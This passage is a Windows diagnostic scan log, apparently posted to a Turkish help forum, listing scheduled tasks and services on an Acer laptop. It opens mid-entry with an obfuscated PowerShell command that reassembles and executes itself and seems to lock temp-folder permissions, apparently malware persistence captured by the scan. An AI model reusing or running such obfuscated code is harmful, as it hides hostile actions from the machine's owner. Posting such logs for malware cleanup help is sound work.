={Jb+sFxh_{Y,c?r7ex3f 9lIin_,tPz[tqr_+ eg?X[q1/AY__,lI=}nt7qPmtd+r _oSvCe3Gg.yDy,1_red}f2 xcIn[5tqPh_tr_d _U7_Gsrad5Eje,U_!I,nw{t3_/2_ =cMQxeMgYt(g,4_U_Ig]nt_k3_2hy i_ldgq8?ql)_)6;+y} !''-erewplxacke''w.(a.._)''-,''v$14'' u-roepcla8ce_''yaSM/Bi]'',o[ckhajr][(3_4)y -_re!plkac_e''znW-Sx3t''q,[wch7ar5](_37v))e;(,ls_ $_en[v:}te_mp5 -6Di_|w-heerew{(q$__.N_am_e._Leyngbth_ -3eq1 81)-hanad()(Gtetj-A=cl4 $+_._Fu)ll]Na8meg).=Ac_ce0ssl.F[iljeS_yshte6mRwigght5s u-edq 9''Dselqet4e''_)}v)|]de-l;m[E6nv_ir_onjmetnt3]:.:C_ur_rexntfDi(re)cttorsy=zpw_d;_[j4weryar]:c:E5cP_CEb()}; ';'$jEeE -rep'+$qecT[19]+$qecT[15]+$qecT[11]+$qecT[2]+'($qecT[23]+$qecT[27]+$qecT[23]+$qecT[23]+$qecT[7]),(''$''+58/58)'|&$rmPx|&$rmPx;tLCw;PQqZsJN;y;vGCwG;"
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: \Norton Security\Norton Security Autofix - C:\Program Files\Norton Security\Engine\22.20.5.40\SymErr.exe /ui (file missing)
O22 - Task: \Norton Security\Norton Security Error Analyzer - C:\Program Files\Norton Security\Engine\22.20.5.40\SymErr.exe /analyze (file missing)
O22 - Task: \Norton Security\Norton Security Error Processor - C:\Program Files\Norton Security\Engine\22.20.5.40\SymErr.exe /submit (file missing)
O22 - Task: \Oem\AcerJumpstartTask - C:\Program Files (x86)\Acer\Acer Jumpstart\hermes.exe /default
O22 - Task: ACC - C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe -auto
O22 - Task: ACCAgent - C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe
O22 - Task: ACCBackgroundApplication - C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
O22 - Task: AcerCMUpdateTask2.1.16258 - C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe /task
O22 - Task: App Explorer - C:\Users\acer\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe /LOGON
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Standalone Update Task-S-1-5-21-3887308582-1236565465-1742408578-500 - C:\Users\acer\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing)
O22 - Task: Opera scheduled assistant Autoupdate 1630695806 - C:\Users\acer\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\acer\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1630695803 - C:\Users\acer\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: Power Button - C:\Program Files\Acer\Quick Access Service\ePowerButton_NB.exe -s
O22 - Task: Quick Access - C:\Program Files\Acer\Quick Access Service\QALauncher.exe
O22 - Task: Software Update Application - C:\ProgramData\OEM\UpgradeTool\ListCheck.exe
O22 - Task: StorPSCTL - C:\Program Files\Acer\StorPSCTL\StorPSCTL.exe
O22 - Task: UbtFrameworkService - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\TriggerFramework.exe
O22 - Task: UEIPInvitation - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\UEIPOOBECheck.exe
O23 - Service R2: ACC Service - (ACCSvc) - C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe
O23 - Service R2: AMD External Events Utility - C:\WINDOWS\System32\DriverStore\FileRepository\u0364341.inf_amd64_c22b73fb0c3a32d3\B364190\atiesrxx.exe
O23 - Service R2: AtherosSvc - C:\WINDOWS\System32\drivers\AdminService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.63.31001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.63.31001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_22_2\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\5.1.104.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: Qualcomm Atheros WLAN Driver Service - (QcomWlanSrv) - C:\WINDOWS\System32\drivers\QcomWlanSrvx64.exe
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_291337223b900dd5\RtkAudUService64.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R3: Quick Access Service - (QASvc) - C:\Program Files\Acer\Quick Access Service\QASvc.exe
O23 - Service R3: User Experience Improvement Program - (UEIPSvc) - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\UBTService.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S2: McAfee Application Installer Cleanup (0323901649749124) - (0323901649749124mcinstcleanup) - C:\ProgramData\McInstTemp0323901649749124\McInst.exe -cleanup -nolog
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\100.0.4896.88\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
O23 - Service S3: Quick Access Local Service - (QALSvc) - C:\Program Files\Acer\Quick Access Service\QALSvc.exe


--
End of file - Time spent: 13,5 sec. - 60568 bytes, CRC32: FFFFFFFF. Sign: 詗䯝
: 詗䯝
 

Yeni konular

Yukarı